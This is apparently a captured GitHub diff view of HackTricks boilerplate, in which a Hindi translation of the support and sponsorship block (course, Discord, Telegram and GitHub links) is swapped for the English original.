Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
Loading…
Reference in a new issue